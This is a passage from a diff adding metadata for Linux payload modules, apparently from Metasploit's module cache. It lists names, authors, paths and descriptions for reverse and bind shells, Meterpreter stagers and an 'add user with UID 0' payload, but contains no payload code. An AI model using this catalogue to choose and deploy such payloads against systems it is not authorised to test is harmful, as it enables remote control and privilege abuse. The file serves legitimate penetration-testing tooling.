"timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb", + 
"is_install_path": true, + "ref_name": "linux/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/pingback_bind_tcp": { + "name": "Linux x64 Pingback, Bind TCP Inline", + "fullname": "payload/linux/x64/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7" + ], + "description": "Accept a connection from attacker and report UUID (Linux x64)", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + 
"payload_type": 1, + "staged": false + }, + "payload_linux/x64/pingback_reverse_tcp": { + "name": "Linux x64 Pingback, Reverse TCP Inline", + "fullname": "payload/linux/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7" + ], + "description": "Connect back to attacker and report UUID (Linux x64)", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/shell/bind_tcp": { + "name": "Linux Command Shell, Bind TCP Stager", + "fullname": "payload/linux/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ricky" + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/bind_tcp" + }, + "payload_linux/x64/shell/reverse_sctp": { + "name": "Linux Command Shell, Reverse SCTP Stager", + "fullname": "payload/linux/x64/shell/reverse_sctp", + "aliases": [], + 
"rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ricky", + "RageLtMan " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-12-20 04:15:41 +0000", + "path": "/modules/payloads/stagers/linux/x64/reverse_sctp.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell/reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/reverse_sctp" + }, + "payload_linux/x64/shell/reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/linux/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ricky", + "tkmru" + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/reverse_tcp" + }, + "payload_linux/x64/shell_bind_ipv6_tcp": { + "name": "Linux x64 Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/linux/x64/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + 
"epi " + ], + "description": "Listen for an IPv6 connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/shell_bind_tcp": { + "name": "Linux Command Shell, Bind TCP Inline", + "fullname": "payload/linux/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ricky" + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/shell_bind_tcp_random_port": { + "name": "Linux Command Shell, Bind TCP Random Port Inline", + "fullname": "payload/linux/x64/shell_bind_tcp_random_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Geyslan G. 
Bem " + ], + "description": "Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm" + ], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell_bind_tcp_random_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/shell_find_port": { + "name": "Linux Command Shell, Find Port Inline", + "fullname": "payload/linux/x64/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mak" + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/shell_find_port.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/shell_reverse_ipv6_tcp": { + "name": "Linux x64 Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/linux/x64/shell_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "epi " + ], + "description": "Connect back to attacker and spawn a command shell over 
IPv6", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/shell_reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ricky" + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/adduser": { + "name": "Linux Add User", + "fullname": "payload/linux/x86/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "vlad902 ", + "spoonm " + ], + "description": "Create a new user with UID 0", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/adduser.rb", + "is_install_path": true, + "ref_name": "linux/x86/adduser", 
+ "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/chmod": { + "name": "Linux Chmod", + "fullname": "payload/linux/x86/chmod", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn " + ], + "description": "Runs chmod on specified file with specified mode", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/chmod.rb", + "is_install_path": true, + "ref_name": "linux/x86/chmod", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/exec": { + "name": "Linux Execute Command", + "fullname": "payload/linux/x86/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "Geyslan G. 
Bem " + ], + "description": "Execute an arbitrary command or just a /bin/sh shell", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm", + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm" + ], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/exec.rb", + "is_install_path": true, + "ref_name": "linux/x86/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/meterpreter/bind_ipv6_tcp": { + "name": "Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)", + "fullname": "payload/linux/x86/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "kris katterjohn ", + "egypt " + ], + "description": "Inject the mettle server payload (staged).\n\nListen for an IPv6 connection (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_ipv6_tcp" + }, + "payload_linux/x86/meterpreter/bind_ipv6_tcp_uuid": { + "name": "Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)", + "fullname": 
"payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "kris katterjohn ", + "egypt ", + "OJ Reeves" + ], + "description": "Inject the mettle server payload (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" + }, + "payload_linux/x86/meterpreter/bind_nonx_tcp": { + "name": "Linux Mettle x86, Bind TCP Stager", + "fullname": "payload/linux/x86/meterpreter/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "skape " + ], + "description": "Inject the mettle server payload (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_nonx_tcp" + }, + 
"payload_linux/x86/meterpreter/bind_tcp": { + "name": "Linux Mettle x86, Bind TCP Stager (Linux x86)", + "fullname": "payload/linux/x86/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "skape ", + "egypt " + ], + "description": "Inject the mettle server payload (staged).\n\nListen for a connection (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_tcp" + }, + "payload_linux/x86/meterpreter/bind_tcp_uuid": { + "name": "Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/linux/x86/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Inject the mettle server payload (staged).\n\nListen for a connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": 
true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_tcp_uuid" + }, + "payload_linux/x86/meterpreter/find_tag": { + "name": "Linux Mettle x86, Find Tag Stager", + "fullname": "payload/linux/x86/meterpreter/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "skape " + ], + "description": "Inject the mettle server payload (staged).\n\nUse an established connection", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/find_tag.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/find_tag" + }, + "payload_linux/x86/meterpreter/reverse_ipv6_tcp": { + "name": "Linux Mettle x86, Reverse TCP Stager (IPv6)", + "fullname": "payload/linux/x86/meterpreter/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "kris katterjohn " + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to attacker over IPv6", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + 
"payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_ipv6_tcp" + }, + "payload_linux/x86/meterpreter/reverse_nonx_tcp": { + "name": "Linux Mettle x86, Reverse TCP Stager", + "fullname": "payload/linux/x86/meterpreter/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "skape " + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_nonx_tcp" + }, + "payload_linux/x86/meterpreter/reverse_tcp": { + "name": "Linux Mettle x86, Reverse TCP Stager", + "fullname": "payload/linux/x86/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "skape ", + "egypt ", + "tkmru" + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + 
"session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_tcp" + }, + "payload_linux/x86/meterpreter/reverse_tcp_uuid": { + "name": "Linux Mettle x86, Reverse TCP Stager", + "fullname": "payload/linux/x86/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "William Webb ", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_tcp_uuid" + }, + "payload_linux/x86/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/x86/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter_reverse_http", + "check": false, + 
"post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/x86/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/x86/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, 
+ "payload_linux/x86/metsvc_bind_tcp": { + "name": "Linux Meterpreter Service, Bind TCP", + "fullname": "payload/linux/x86/metsvc_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Stub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/metsvc_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/metsvc_reverse_tcp": { + "name": "Linux Meterpreter Service, Reverse TCP Inline", + "fullname": "payload/linux/x86/metsvc_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Stub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/metsvc_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/read_file": { + "name": "Linux Read File", + "fullname": "payload/linux/x86/read_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hal" + ], + "description": "Read up to 4096 bytes from the local file system and 
write it back out to the specified file descriptor", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/read_file.rb", + "is_install_path": true, + "ref_name": "linux/x86/read_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/shell/bind_ipv6_tcp": { + "name": "Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)", + "fullname": "payload/linux/x86/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "kris katterjohn ", + "egypt " + ], + "description": "Spawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_ipv6_tcp" + }, + "payload_linux/x86/shell/bind_ipv6_tcp_uuid": { + "name": "Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/linux/x86/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "kris katterjohn ", + "egypt ", + "OJ Reeves" + ], + "description": "Spawn a command shell (staged).\n\nListen for an IPv6 
connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" + }, + "payload_linux/x86/shell/bind_nonx_tcp": { + "name": "Linux Command Shell, Bind TCP Stager", + "fullname": "payload/linux/x86/shell/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_nonx_tcp" + }, + "payload_linux/x86/shell/bind_tcp": { + "name": "Linux Command Shell, Bind TCP Stager (Linux x86)", + "fullname": 